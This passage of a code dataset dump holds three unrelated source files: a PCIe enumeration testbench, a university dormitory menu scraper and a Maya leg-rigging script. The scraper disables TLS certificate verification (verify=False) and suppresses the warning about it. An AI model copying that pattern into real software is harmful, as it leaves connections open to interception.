0x010+(bar+1)*4, (val >> 32) & 0xffffffff)\n\n bar += 2\n else:\n # 32 bit BAR\n mask = (~val & 0xffffffff) | 15\n size = mask + 1\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d raw: %08x, mask: %08x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, mask, size))\n\n if val & 8:\n # prefetchable\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d marked prefetchable, but allocating as non-prefetchable\" % (highlight(self.get_desc()), bus, d, f, bar))\n\n # align and allocate\n self.mem_limit = align(self.mem_limit, mask)\n val = val & 15 | self.mem_limit\n self.mem_limit += size\n\n ti.bar[bar] = val\n ti.bar_size[bar] = size\n\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d Allocation: %08x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, size))\n\n # write BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+bar*4, val)\n\n bar += 1\n\n # logging\n print(\"[%s] Walk capabilities of %02x:%02x.%x\" % (highlight(self.get_desc()), bus, d, f))\n\n # walk capabilities\n ptr = yield from self.config_read_byte(PcieId(bus, d, f), 0x34)\n ptr = ptr & 0xfc\n\n while ptr > 0:\n val = yield from self.config_read(PcieId(bus, d, f), ptr, 2)\n # logging\n print(\"[%s] Found capability 0x%02x at offset 0x%02x, next ptr 0x%02x\" % (highlight(self.get_desc()), val[0], ptr, val[1] & 0xfc))\n ti.capabilities.append((val[0], ptr))\n ptr = val[1] & 0xfc\n\n # walk extended capabilities\n # TODO\n\n # set max payload size, max read request size, and extended tag enable\n dev_cap = yield from self.capability_read_dword(PcieId(bus, d, f), PCIE_CAP_ID, 4)\n dev_ctrl_sta = yield from self.capability_read_dword(PcieId(bus, d, f), PCIE_CAP_ID, 8)\n\n max_payload = min(0x5, min(self.max_payload_size, dev_cap & 7))\n ext_tag = bool(self.extended_tag_field_enable and (dev_cap & (1 << 5)))\n max_read_req = min(0x5, self.max_read_request_size)\n\n new_dev_ctrl = dev_ctrl_sta & 0x00008e1f | (max_payload << 5) | (ext_tag << 8) | (max_read_req << 12)\n\n yield from self.capability_write_dword(PcieId(bus, d, f), PCIE_CAP_ID, 8, new_dev_ctrl)\n\n if enable_bus_mastering:\n # enable bus mastering\n val = yield from self.config_read_word(PcieId(bus, d, f), 0x04)\n yield from self.config_write_word(PcieId(bus, d, f), 0x04, val | 4)\n\n if configure_msi:\n # configure MSI\n yield from self.configure_msi(PcieId(bus, d, f))\n\n if bridge:\n # set bridge registers for enumeration\n # logging\n print(\"[%s] Set pri %d, sec %d, sub %d\" % (highlight(self.get_desc()), bus, sec_bus, 255))\n\n yield from self.config_write(PcieId(bus, d, f), 0x018, bytearray([bus, sec_bus, 255]))\n\n # enumerate secondary bus\n sub_bus = yield from self.enumerate_segment(tree=ti, bus=sec_bus, timeout=timeout, enable_bus_mastering=enable_bus_mastering, configure_msi=configure_msi)\n\n # finalize bridge configuration\n # logging\n print(\"[%s] Set pri %d, sec %d, sub %d\" % (highlight(self.get_desc()), bus, sec_bus, sub_bus))\n\n yield from self.config_write(PcieId(bus, d, f), 0x018, bytearray([bus, sec_bus, sub_bus]))\n\n # set base/limit registers\n # logging\n print(\"[%s] Set IO base: %08x, limit: %08x\" % (highlight(self.get_desc()), ti.io_base, ti.io_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x01C, struct.pack('BB', (ti.io_base >> 8) & 0xf0, (ti.io_limit >> 8) & 0xf0))\n yield from self.config_write(PcieId(bus, d, f), 0x030, struct.pack('> 16, ti.io_limit >> 16))\n\n # logging\n print(\"[%s] Set mem base: %08x, limit: %08x\" % (highlight(self.get_desc()), ti.mem_base, ti.mem_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x020, struct.pack('> 16) & 0xfff0, (ti.mem_limit >> 16) & 0xfff0))\n\n # logging\n print(\"[%s] Set prefetchable mem base: %016x, limit: %016x\" % (highlight(self.get_desc()), ti.prefetchable_mem_base, ti.prefetchable_mem_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x024, struct.pack('> 16) & 0xfff0, (ti.prefetchable_mem_limit >> 16) & 0xfff0))\n yield from self.config_write(PcieId(bus, d, f), 0x028, struct.pack('> 32))\n yield from self.config_write(PcieId(bus, d, f), 0x02c, struct.pack('> 32))\n\n sec_bus = sub_bus+1\n\n tree.sub_bus_num = sub_bus\n\n # align limits against bridge registers\n self.io_limit = align(self.io_limit, 0xfff)\n self.mem_limit = align(self.mem_limit, 0xfffff)\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, 0xfffff)\n\n tree.io_limit = self.io_limit-1\n tree.mem_limit = self.mem_limit-1\n tree.prefetchable_mem_limit = self.prefetchable_mem_limit-1\n\n # logging\n print(\"[%s] Enumeration of bus %d complete\" % (highlight(self.get_desc()), bus))\n\n return sub_bus\n\n def enumerate(self, timeout=1000, enable_bus_mastering=False, configure_msi=False):\n # logging\n print(\"[%s] Enumerating bus\" % (highlight(self.get_desc())))\n\n self.io_limit = self.io_base\n self.mem_limit = self.mem_base\n self.prefetchable_mem_limit = self.prefetchable_mem_base\n\n self.tree = TreeItem()\n yield from self.enumerate_segment(tree=self.tree, bus=0, timeout=timeout, enable_bus_mastering=enable_bus_mastering, configure_msi=configure_msi)\n\n self.upstream_bridge.io_base = self.io_base\n self.upstream_bridge.io_limit = self.io_limit\n self.upstream_bridge.mem_base = self.mem_base\n self.upstream_bridge.mem_limit = self.mem_limit\n self.upstream_bridge.prefetchable_mem_base = self.prefetchable_mem_base\n self.upstream_bridge.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n # logging\n print(\"[%s] Enumeration complete\" % (highlight(self.get_desc())))\n\n # logging\n print(\"Device tree:\")\n print(self.tree.to_str().strip())\n\n","repo_name":"corundum/corundum","sub_path":"fpga/lib/pcie/tb/pcie.py","file_name":"pcie.py","file_ext":"py","file_size_in_byte":180598,"program_lang":"python","lang":"en","doc_type":"code","stars":1336,"dataset":"github-code","pt":"3"} +{"seq_id":"39365218547","text":"from urllib import response\nfrom flask import Flask, json, request, jsonify\nimport sys\nfrom queue import Empty\nimport requests,re\nfrom bs4 import BeautifulSoup\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\nurl = 'https://tu.ac.kr/dormitory/index.do'\n\nresponse = requests.get(url, verify=False)\nif response.status_code == 200:\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n try:\n alert = soup.select(\"li.item\")\n except:\n print('식단 업데이트가 되지 않는 날입니다.')\n string = ''\n for i in alert:\n string += i.get_text()\n print(string.strip())\nelse:\n print('학교 홈페이지 문제 발생')","repo_name":"SeungHoonJeon/School-Cafeteria-Bot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15636844211","text":"#Alejandro Munoz Medina\n\n#Complete prebehavior script for pants' pantss with no roll and manipulators\n\nimport maya.cmds as mc\n\ndef patch():\n\n import maya.cmds as mc\n\n def main():\n\n import maya.cmds as mc\n\n #######################################\n ############### No Roll ###############\n #######################################\n\n # no twist joints\n\n # ankle\n\n def ankleNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n frLegTip = (\"%s_leg_02_tip_twist\" % side)\n\n # create control for the attibutes and prep it\n attrControl = \"%s_leg_SW_ctrl\" % side\n\n # add attribute(s) to the new control:\n\n mc.addAttr(attrControl, at=\"enum\", en='sleeveRoll',\n sn=\"sep21\",\n ln=\"__________________\",\n k=False, h=False)\n mc.setAttr('%s.sep21' % attrControl, cb=True)\n\n # add attribute(s) to the new control:\n mc.addAttr(attrControl, at=\"bool\", sn=\"%s_nr\" % side, ln=\"%s_no_roll\" % side,\n max=1.0, min=0.0, dv=1.0, k=True, h=False)\n\n # create the no twist joint\n frLegNtTip = mc.duplicate(frLegTip, n=\"%s_leg_02_tip_no_twist\" % side)\n\n # refer to hip\n hip = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender = mc.createNode(\"blendTwoAttr\", n=\"%s_ankle_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip, \"%s.rz\" % frLegNtTip[0])\n mc.connectAttr(\"%s.rz\" % frLegTip, \"%s.input[0]\" % blender)\n mc.connectAttr(\"%s.rz\" % frLegNtTip[0], \"%s.input[1]\" % blender)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.ab\" % blender, f=True)\n\n # foreleg\n\n def forelegNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n frLeg = (\"%s_leg_02_bend_twist\" % side)\n\n # refer to attribute control\n attrControl1 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n frLegNt = mc.duplicate(frLeg, n=\"%s_leg_02_bend_no_twist\" % side)\n\n # refer to hip\n hip1 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender1 = mc.createNode(\"blendTwoAttr\", n=\"%s_foreleg_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip1, \"%s.rz\" % frLegNt[0])\n mc.connectAttr(\"%s.rz\" % frLeg, \"%s.input[0]\" % blender1)\n mc.connectAttr(\"%s.rz\" % frLegNt[0], \"%s.input[1]\" % blender1)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl1, side), \"%s.ab\" % blender1, f=True)\n\n # knee (front)\n\n def kneeFrontNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n kneeFrnt = (\"%s_leg_02_base_twist\" % side)\n\n # refer to attribute control\n attrControl2 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n kneeFrntNt = mc.duplicate(kneeFrnt, n=\"%s_leg_02_base_no_twist\" % side)\n\n # refer to hip\n hip2 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender2 = mc.createNode(\"blendTwoAttr\", n=\"%s_kneeBack_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip2, \"%s.rz\" % kneeFrntNt[0])\n mc.connectAttr(\"%s.rz\" % kneeFrnt, \"%s.input[0]\" % blender2)\n mc.connectAttr(\"%s.rz\" % kneeFrntNt[0], \"%s.input[1]\" % blender2)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl2, side), \"%s.ab\" % blender2, f=True)\n\n # knee (back)\n\n def kneeBackNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n kneebck = (\"%s_leg_01_tip_twist\" % side)\n\n # refer to attribute control\n attrControl3 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n kneebckNt = mc.duplicate(kneebck, n=\"%s_leg_01_tip_no_twist\" % side)\n\n # refer to hip\n hip3 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender3 = mc.createNode(\"blendTwoAttr\", n=\"%s_kneeFrnt_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip3, \"%s.rz\" % kneebckNt[0])\n mc.connectAttr(\"%s.rz\" % kneebck, \"%s.input[0]\" % blender3)\n mc.connectAttr(\"%s.rz\" % kneebckNt[0], \"%s.input[1]\" % blender3)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl3, side), \"%s.ab\" % blender3, f=True)\n\n # upperleg\n\n def upperlegNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n upperleg = (\"%s_leg_01_bend_twist\" % side)\n\n # refer to attribute control\n attrControl4 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n upperlegNt = mc.duplicate(upperleg, n=\"%s_leg_01_bend_no_twist\" % side)\n\n # refer to hip\n hip4 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender4 = mc.createNode(\"blendTwoAttr\", n=\"%s_upperleg_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip4, \"%s.rz\" % upperlegNt[0])\n mc.connectAttr(\"%s.rz\" % upperleg, \"%s.input[0]\" % blender4)\n mc.connectAttr(\"%s.rz\" % upperlegNt[0], \"%s.input[1]\" % blender4)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl4, side), \"%s.ab\" % blender4, f=True)\n\n # hip\n\n def hipNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n hp = (\"%s_leg_01_base_twist\" % side)\n\n # refer to attribute control\n attrControl5 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n hpNt = mc.duplicate(hp, n=\"%s_leg_01_base_no_twist\" % side)\n\n # refer to hip\n hip5 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender5 = mc.createNode(\"blendTwoAttr\", n=\"%s_hip_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip5, \"%s.rz\" % hpNt[0])\n mc.connectAttr(\"%s.rz\" % hp, \"%s.input[0]\" % blender5)\n mc.connectAttr(\"%s.rz\" % hpNt[0], \"%s.input[1]\" % blender5)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl5, side), \"%s.ab\" % blender5, f=True)\n\n #######################################\n\n # duplicate NURBS surfaces\n\n def surfaceDuplicate(side, section):\n\n import maya.cmds as mc\n\n surface = (\"%s_leg_%s_deform_ns\" % (side, section))\n\n noTwistJnts = [\"%s_leg_%s_base_no_twist\" % (side, section),\n \"%s_leg_%s_bend_no_twist\" % (side, section),\n \"%s_leg_%s_tip_no_twist\" % (side, section)]\n\n surfaceNt = mc.duplicate(surface, n=\"%s_no_twist\" % surface)\n\n mc.skinCluster(noTwistJnts[0],\n noTwistJnts[1],\n noTwistJnts[2],\n surfaceNt[0], n=\"%s_sc\" % surfaceNt[0], tsb=True)\n\n skinClusterSource = mc.ls(mc.listHistory(surface, pdo=True), type='skinCluster')\n newSkincluster = mc.ls(mc.listHistory(surfaceNt[0], pdo=True), type='skinCluster')\n cvs = mc.ls('%s.cv[*][*]' % surface, fl=True)\n for cv in cvs:\n skinWeights = mc.skinPercent(skinClusterSource[0], cv, query=True, value=True)\n newCv = cv.replace(surface, surfaceNt[0])\n mc.skinPercent(newSkincluster[0], newCv, transformValue=[(noTwistJnts[0], skinWeights[0]),\n (noTwistJnts[1], skinWeights[1]),\n (noTwistJnts[2], skinWeights[2])])\n\n #######################################\n\n # follicle maker\n\n def legsfollicles(side, section):\n\n import maya.cmds as mc\n\n # list important objects\n constantName = (\"%s_leg_%s_deform\" % (side, section))\n legSwitch = (\"%s_leg_SW_ctrl\" % side)\n deformGRP = (\"%s_leg_%s_deform_grp\" % (side, section))\n surface = (\"%s_ns_no_twist\" % constantName)\n\n # first transformGeometry\n tg0 = mc.createNode(\"transformGeometry\", n=\"%s_tg0\" % surface)\n mc.connectAttr(\"%sShape.local\" % surface, \"%s.ig\" % tg0, )\n mc.connectAttr(\"%s.wim\" % deformGRP, \"%s.txf\" % tg0)\n\n # first curveFromSurfaceIso\n cfsi0 = mc.createNode(\"curveFromSurfaceIso\", n=\"%s_cfsi0\" % surface)\n mc.connectAttr(\"%s.og\" % tg0, \"%s.is\" % cfsi0)\n mc.setAttr(\"%s.minValue\" % cfsi0, 0)\n mc.setAttr(\"%s.maxValue\" % cfsi0, 1)\n\n # second curveFromSurfaceIso\n cfsi1 = mc.createNode(\"curveFromSurfaceIso\", n=\"%s_cfsi1\" % surface)\n mc.connectAttr(\"%s.og\" % tg0, \"%s.is\" % cfsi1)\n mc.setAttr(\"%s.minValue\" % cfsi1, 0)\n mc.setAttr(\"%s.maxValue\" % cfsi1, 1)\n mc.setAttr(\"%s.iv\" % cfsi1, 1)\n\n # first rebuildCurve\n rc0 = mc.createNode(\"rebuildCurve\", n=\"%s_rc0\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi0, \"%s.ic\" % rc0)\n mc.setAttr(\"%s.keepRange\" % rc0, 0)\n\n # second rebuildCurve\n rc1 = mc.createNode(\"rebuildCurve\", n=\"%s_rc1\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi1, \"%s.ic\" % rc1)\n mc.setAttr(\"%s.keepRange\" % rc1, 0)\n\n # evenspread switch\n essw = mc.createNode(\"blendTwoAttr\", n=\"%s_essw\" % surface)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.ab\" % essw)\n mc.setAttr(\"%s.i[0]\" % essw, 1)\n\n # first avgCurves\n ac0 = mc.createNode(\"avgCurves\", n=\"%s_ac0\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi0, \"%s.ic1\" % ac0)\n mc.connectAttr(\"%s.oc\" % rc0, \"%s.ic2\" % ac0)\n mc.connectAttr(\"%s.o\" % essw, \"%s.w1\" % ac0)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.w2\" % ac0)\n mc.setAttr(\"%s.automaticWeight\" % ac0, 0)\n\n # second avgCurves\n ac1 = mc.createNode(\"avgCurves\", n=\"%s_ac1\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi1, \"%s.ic1\" % ac1)\n mc.connectAttr(\"%s.oc\" % rc1, \"%s.ic2\" % ac1)\n mc.connectAttr(\"%s.o\" % essw, \"%s.w1\" % ac1)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.w2\" % ac1)\n mc.setAttr(\"%s.automaticWeight\" % ac1, 0)\n\n # loft\n loft = mc.createNode(\"loft\", n=\"%s_loft\" % surface)\n mc.connectAttr(\"%s.oc\" % ac0, \"%s.ic[0]\" % loft)\n mc.connectAttr(\"%s.oc\" % ac1, \"%s.ic[1]\" % loft)\n mc.setAttr(\"%s.uniform\" % loft, 1)\n mc.setAttr(\"%s.autoReverse\" % loft, 0)\n mc.setAttr(\"%s.reverseSurfaceNormals\" % loft, 1)\n\n # second transformGeometry\n tg1 = mc.createNode(\"transformGeometry\", n=\"%s_tg1\" % surface)\n mc.connectAttr(\"%s.os\" % loft, \"%s.ig\" % tg1, )\n mc.connectAttr(\"%s.wm[0]\" % deformGRP, \"%s.txf\" % tg1)\n\n # --------------------------\n\n # follicles\n\n # first follicle\n fol1 = mc.createNode(\"follicle\", n=\"%s_att_01Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol1)\n mc.connectAttr(\"%s.outRotate\" % fol1, \"%s_att_01.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol1, \"%s_att_01.t\" % surface)\n mc.parent(\"%s_att_01\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol1, 0.125)\n mc.setAttr(\"%s.parameterV\" % fol1, 0.5)\n mc.setAttr(\"%s_att_01.inheritsTransform\" % surface, 0)\n\n # second follicle\n fol2 = mc.createNode(\"follicle\", n=\"%s_att_02Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol2)\n mc.connectAttr(\"%s.outRotate\" % fol2, \"%s_att_02.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol2, \"%s_att_02.t\" % surface)\n mc.parent(\"%s_att_02\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol2, 0.375)\n mc.setAttr(\"%s.parameterV\" % fol2, 0.5)\n mc.setAttr(\"%s_att_02.inheritsTransform\" % surface, 0)\n\n # third follicle\n fol3 = mc.createNode(\"follicle\", n=\"%s_att_03Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol3)\n mc.connectAttr(\"%s.outRotate\" % fol3, \"%s_att_03.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol3, \"%s_att_03.t\" % surface)\n mc.parent(\"%s_att_03\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol3, 0.625)\n mc.setAttr(\"%s.parameterV\" % fol3, 0.5)\n mc.setAttr(\"%s_att_03.inheritsTransform\" % surface, 0)\n\n # fourth follicle\n fol4 = mc.createNode(\"follicle\", n=\"%s_att_04Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol4)\n mc.connectAttr(\"%s.outRotate\" % fol4, \"%s_att_04.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol4, \"%s_att_04.t\" % surface)\n mc.parent(\"%s_att_04\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol4, 0.875)\n mc.setAttr(\"%s.parameterV\" % fol4, 0.5)\n mc.setAttr(\"%s_att_04.inheritsTransform\" % surface, 0)\n\n # --------------------------\n\n # post follicle actions\n\n # first orig joint\n jntOrig1 = mc.duplicate(\"%s_leg_%s_deform_SKN_01_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_01_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig1[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig1[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig1[0], 0)\n jnt1 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_01\" % (side, section))\n mc.parent(jnt1, jntOrig1[0], r=True)\n mc.select(cl=True)\n jntCtrl1 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_01\" % (side, section))\n mc.parent(jntCtrl1, jntOrig1[0], r=True)\n mc.parent(jntOrig1[0], \"%s_att_01\" % surface, r=True)\n mc.parent(jntOrig1[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig1[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt1, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl1, 2)\n\n # first multMatrix\n mm1 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_01_mm\" % (side, section))\n mc.connectAttr(\"%s_att_01.m\" % surface, \"%s.i[0]\" % mm1)\n mc.connectAttr(\"%s.pim\" % jntOrig1[0], \"%s.i[1]\" % mm1)\n\n # first decomposeMatrix\n dm1 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_01_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm1, \"%s.inputMatrix\" % dm1)\n mc.connectAttr(\"%s.outputRotate\" % dm1, \"%s.r\" % jntOrig1[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm1, \"%s.t\" % jntOrig1[0])\n mc.setAttr(\"%s.jo\" % jntOrig1[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl1, \"%s.t\" % jnt1)\n mc.connectAttr(\"%s.r\" % jntCtrl1, \"%s.r\" % jnt1)\n mc.connectAttr(\"%s.s\" % jntCtrl1, \"%s.s\" % jnt1)\n mc.connectAttr(\"%s.ro\" % jntCtrl1, \"%s.ro\" % jnt1)\n\n # second orig joint\n jntOrig2 = mc.duplicate(\"%s_leg_%s_deform_SKN_02_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_02_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig2[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig2[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig2[0], 0)\n jnt2 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_02\" % (side, section))\n mc.parent(jnt2, jntOrig2[0], r=True)\n mc.select(cl=True)\n jntCtrl2 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_02\" % (side, section))\n mc.parent(jntCtrl2, jntOrig2[0], r=True)\n mc.parent(jntOrig2[0], \"%s_att_02\" % surface, r=True)\n mc.parent(jntOrig2[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig2[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt2, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl2, 2)\n\n # second multMatrix\n mm2 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_02_mm\" % (side, section))\n mc.connectAttr(\"%s_att_02.m\" % surface, \"%s.i[0]\" % mm2)\n mc.connectAttr(\"%s.pim\" % jntOrig2[0], \"%s.i[1]\" % mm2)\n\n # second decomposeMatrix\n dm2 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_02_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm2, \"%s.inputMatrix\" % dm2)\n mc.connectAttr(\"%s.outputRotate\" % dm2, \"%s.r\" % jntOrig2[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm2, \"%s.t\" % jntOrig2[0])\n mc.setAttr(\"%s.jo\" % jntOrig2[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl2, \"%s.t\" % jnt2)\n mc.connectAttr(\"%s.r\" % jntCtrl2, \"%s.r\" % jnt2)\n mc.connectAttr(\"%s.s\" % jntCtrl2, \"%s.s\" % jnt2)\n mc.connectAttr(\"%s.ro\" % jntCtrl2, \"%s.ro\" % jnt2)\n\n # third orig joint\n jntOrig3 = mc.duplicate(\"%s_leg_%s_deform_SKN_03_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_03_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig3[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig3[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig3[0], 0)\n jnt3 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_03\" % (side, section))\n mc.parent(jnt3, jntOrig3[0], r=True)\n mc.select(cl=True)\n jntCtrl3 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_03\" % (side, section))\n mc.parent(jntCtrl3, jntOrig3[0], r=True)\n mc.parent(jntOrig3[0], \"%s_att_03\" % surface, r=True)\n mc.parent(jntOrig3[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig3[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt3, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl3, 2)\n\n # third multMatrix\n mm3 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_03_mm\" % (side, section))\n mc.connectAttr(\"%s_att_03.m\" % surface, \"%s.i[0]\" % mm3)\n mc.connectAttr(\"%s.pim\" % jntOrig3[0], \"%s.i[1]\" % mm3)\n\n # third decomposeMatrix\n dm3 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_03_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm3, \"%s.inputMatrix\" % dm3)\n mc.connectAttr(\"%s.outputRotate\" % dm3, \"%s.r\" % jntOrig3[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm3, \"%s.t\" % jntOrig3[0])\n mc.setAttr(\"%s.jo\" % jntOrig3[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl3, \"%s.t\" % jnt3)\n mc.connectAttr(\"%s.r\" % jntCtrl3, \"%s.r\" % jnt3)\n mc.connectAttr(\"%s.s\" % jntCtrl3, \"%s.s\" % jnt3)\n mc.connectAttr(\"%s.ro\" % jntCtrl3, \"%s.ro\" % jnt3)\n\n # fourth orig joint\n jntOrig4 = mc.duplicate(\"%s_leg_%s_deform_SKN_04_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_04_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig4[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig4[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig4[0], 0)\n jnt4 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_04\" % (side, section))\n mc.parent(jnt4, jntOrig4[0], r=True)\n mc.select(cl=True)\n jntCtrl4 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_04\" % (side, section))\n mc.parent(jntCtrl4, jntOrig4[0], r=True)\n mc.parent(jntOrig4[0], \"%s_att_04\" % surface, r=True)\n mc.parent(jntOrig4[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig4[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt4, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl4, 2)\n\n # fourth multMatrix\n mm4 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_04_mm\" % (side, section))\n mc.connectAttr(\"%s_att_04.m\" % surface, \"%s.i[0]\" % mm4)\n mc.connectAttr(\"%s.pim\" % jntOrig4[0], \"%s.i[1]\" % mm4)\n\n # fourth decomposeMatrix\n dm4 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_04_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm4, \"%s.inputMatrix\" % dm4)\n mc.connectAttr(\"%s.outputRotate\" % dm4, \"%s.r\" % jntOrig4[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm4, \"%s.t\" % jntOrig4[0])\n mc.setAttr(\"%s.jo\" % jntOrig4[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl4, \"%s.t\" % jnt4)\n mc.connectAttr(\"%s.r\" % jntCtrl4, \"%s.r\" % jnt4)\n mc.connectAttr(\"%s.s\" % jntCtrl4, \"%s.s\" % jnt4)\n mc.connectAttr(\"%s.ro\" % jntCtrl4, \"%s.ro\" % jnt4)\n\n # no twist thight joints\n\n def thighJnts(side):\n\n import maya.cmds as mc\n\n # refer to the no roll attribute control\n attrCtrl = \"%s_leg_SW_ctrl\" % side\n rev = mc.createNode(\"reverse\", n=\"%s_leg_01_no_twist_rev\" % side)\n mc.connectAttr(\"%s.%s_nr\" % (attrCtrl, side), \"%s.ix\" % rev)\n\n # refer to thigh joints\n jnt1 = 